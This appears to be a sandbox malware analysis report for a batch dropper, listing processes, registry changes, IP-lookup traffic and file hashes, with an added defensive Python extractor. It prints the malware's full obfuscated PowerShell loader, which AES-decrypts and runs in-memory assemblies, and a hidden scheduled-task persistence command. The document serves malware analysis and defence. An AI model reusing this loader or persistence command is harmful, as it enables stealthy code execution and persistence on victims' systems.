| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_262_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
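The `cmd.exe /S /D /c" echo function ...` command above is the whole loader, and it is identical in behavioral1 and behavioral3 apart from the path of the .bat it reads: it scans the batch file for the line beginning with the 20-character marker `wbcEgAsGQeSLuSguymAP`, takes everything after it, splits on `\`, undoes a `#`/`@` substitution, Base64-decodes, AES-CBC-decrypts with the hard-coded key and IV, GZip-inflates, and hands each result to `Assembly.Load` (spelled backwards as `'daoL'[-1..-4] -join ''`) before invoking its entry point. The Python below is an added example written for this page, not code from the report or from the malware author: it repeats the same decoding stages statically and writes the recovered assemblies to disk instead of executing them. The key and IV are the ones visible in the command line; the third-party `cryptography` package is assumed for the AES step (everything else is standard library), and the output file names are my choice. The same script works on the persistence copy in `AppData\Roaming`, which the Files section shows is byte-identical to the submitted sample (same SHA256).

```python
"""Static extractor for the two-stage loader echoed into PowerShell in this report.
Added example, not code from the page or the malware: it re-implements the
decoding steps of decrypt_function / decompress_function but never calls
Assembly.Load. Needs the third-party `cryptography` package for the AES stage only."""
import base64
import gzip
import sys

MARKER = "wbcEgAsGQeSLuSguymAP"   # the loader does StartsWith(MARKER) then Substring(20)
AES_KEY = base64.b64decode("/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI=")   # 32 bytes -> AES-256
AES_IV = base64.b64decode("ghwm5EhH8tXaBpOVD1X+Rg==")                        # 16 bytes


def decode_blob(blob: str) -> bytes:
    """Undo the loader's Replace('#','/').Replace('@','A') and Base64 step."""
    return base64.b64decode(blob.replace("#", "/").replace("@", "A"))


def aes_cbc_decrypt(data: bytes) -> bytes:
    """AES-CBC with PKCS7 padding, the parameters set in decrypt_function."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    dec = Cipher(algorithms.AES(AES_KEY), modes.CBC(AES_IV)).decryptor()
    padded = dec.update(data) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()


def find_payload_line(text: str) -> str:
    """Return the text after the marker on the first line that starts with it."""
    for line in text.splitlines():
        if line.startswith(MARKER):
            return line[len(MARKER):]
    raise ValueError("marker line not found; not this loader variant")


def extract_payloads(text: str, decrypt=aes_cbc_decrypt) -> list:
    """Marker line -> split on '\\' -> substitution+Base64 -> AES -> GZip, per blob.
    `decrypt` is injectable so the non-crypto stages can be checked without the key."""
    blobs = find_payload_line(text).split("\\")
    return [gzip.decompress(decrypt(decode_blob(b))) for b in blobs]


def describe(payload: bytes) -> str:
    """The loader passes each result to Assembly.Load, so a valid stage starts with MZ."""
    kind = "PE (MZ) image" if payload[:2] == b"MZ" else "non-PE blob"
    return "%s, %d bytes" % (kind, len(payload))


def encode_blob(raw: bytes, encrypt=lambda b: b) -> str:
    """Forward transform (GZip -> encrypt -> Base64 -> substitutions); used only to
    build self-check fixtures, since no packer output is embedded in this example."""
    b64 = base64.b64encode(encrypt(gzip.compress(raw))).decode()
    return b64.replace("A", "@").replace("/", "#")


if __name__ == "__main__":
    # Usage (file name assumed): python extract_loader.py "Space Paid v2.bat"
    with open(sys.argv[1], "r", encoding="utf-8", errors="ignore") as fh:
        for i, payload in enumerate(extract_payloads(fh.read()), 1):
            out = "payload%d.bin" % i
            with open(out, "wb") as dst:
                dst.write(payload)
            print(out, describe(payload))
```

Two details worth keeping in mind when reusing this: the marker line is an ordinary line of the .bat as far as cmd.exe is concerned, so other samples of the same builder can change the marker, key and IV while keeping the stage order, and `find_payload_line` is where that shows up first; and the loader invokes the first assembly with `$null` and the second with an empty `string[]`, so the two recovered files are not interchangeable even though they are encoded identically.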
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freegeoip.net | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
Files
memory/3596-0-0x00007FFFFD683000-0x00007FFFFD685000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4eaxo42x.pnf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3596-9-0x0000020C7D3D0000-0x0000020C7D3F2000-memory.dmp
memory/3596-10-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/3596-11-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/3596-12-0x0000020C7D830000-0x0000020C7D876000-memory.dmp
memory/3596-13-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/3596-14-0x0000020C7D470000-0x0000020C7D478000-memory.dmp
memory/3596-15-0x0000020C7D880000-0x0000020C7D8F0000-memory.dmp
memory/1172-17-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/1172-26-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/1172-27-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/1172-30-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.vbs
| MD5 | 9b08c93e91fc8f98135f6739773d2895 |
| SHA1 | 588ac73c0e7d9e96d94d537bce9fe6ce0f431f77 |
| SHA256 | 84b18370ed253d92e23b6582a927a8f8218063b7111090d8613a9228b7bb017b |
| SHA512 | aad984a817257788ad2166cc27ccf99d7298bf363a991686807411300e6a9a114774c623acb6773ffbd06d4610500787d2f4e21bfdf3388fd32e471a1e791897 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_262.bat
| MD5 | a5c3bef843c9d6022db92547f32855d1 |
| SHA1 | 816338da7ee45d496f39bbd36c6b106ee0b3e2fe |
| SHA256 | ef70e618b652c777b3b2e589d1381bda6c7e49e7f2510334257c1e2add139045 |
| SHA512 | 0e44e31275a89f29388418538f57cb3437ad1d24f08d0c3c7d85a1a906c5b212024f2960237b66e3f2838923497e82f198ad8c4ed0b34548190e6db03504f1bd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 163e14e51fd8b0531d78be5d1545e7ba |
| SHA1 | 5a7c318d27842573a197b62afd0ae28307cc63b5 |
| SHA256 | 327322c1f043991fd9532975c6a07ddcdd95670ffe853c5ecc4421dc8ba96cc3 |
| SHA512 | 0deaf77247da2d14df6eee4b4a1dbc0c0834e15d64c81cade859979be644d0e93fa90749839a64d27c8b6322572f6789e916864dfc3372e57a5c56e87acff9e7 |
memory/3320-47-0x00000000027E0000-0x000000000280A000-memory.dmp
memory/2008-98-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1152-97-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/2556-95-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1804-104-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/3320-99-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/720-96-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/2260-103-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/3612-102-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/4452-101-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1312-109-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1504-100-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1900-108-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/932-105-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1892-110-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/1220-107-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/2744-106-0x00007FF7DE570000-0x00007FF7DE580000-memory.dmp
memory/3596-132-0x00007FFFFD680000-0x00007FFFFE142000-memory.dmp
memory/3932-144-0x0000017C7F1E0000-0x0000017C7F23E000-memory.dmp
memory/3932-145-0x0000017C7F660000-0x0000017C7F672000-memory.dmp